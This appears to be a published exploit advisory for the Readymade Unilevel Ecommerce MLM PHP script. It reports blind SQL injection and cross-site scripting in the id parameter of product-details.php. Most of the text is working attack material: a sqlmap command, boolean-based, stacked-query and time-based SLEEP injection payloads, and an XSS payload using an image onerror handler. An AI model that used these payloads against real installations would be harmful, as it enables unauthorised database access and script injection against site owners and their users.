Share
## https://sploitus.com/exploit?id=1337DAY-ID-39703
[x]========================================================================================================================================[x]
 | Title        : Readymade Unilevel Ecommerce MLM Blind SQL & XSS Vulnerabilities
 | Software     : Readymade Unilevel Ecommerce
 | Last Update  : 15/03/24 [TESTED VERSION SCRIPT]
 | First Release: 16/11/21
 | Vendor       : http://www.i-netsolution.com/
 | Date         : 01 Agustus 2024
 | Author       : OoN_Boy
[x]========================================================================================================================================[x]
 | Technology       : PHP
 | Database         : MySQL
 | Price            : $500
 | Description      : MLM Unilevel Plan Script developed by experts and professionals. Rather than building your business from the scratch, make use of our Unilevel MLM PHP Script to launch your MLM business.
[x]========================================================================================================================================[x]

[O] Exploit
  
  http://localhost/eommlm/product-details.php?id=11[SQL]
  http://localhost/ecomlm/product-details.php?id=11[XSS]
  
[O] Proof of concept
  
  sqlmap.py -u "http://localhost/eommlm/product-details.php?id=11" --invalid-string
  
  [SQL]
  Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=11 AND 1189=1189

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: id=11;SELECT SLEEP(10)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=11 AND (SELECT 6812 FROM (SELECT(SLEEP(10)))DddL)

  
  [XSS]  
  http://localhost/ecomlm/product-details.php?id=11"><img/src/onerror=.1|alert`VrsHckGAY`+class=VrsHckGAY>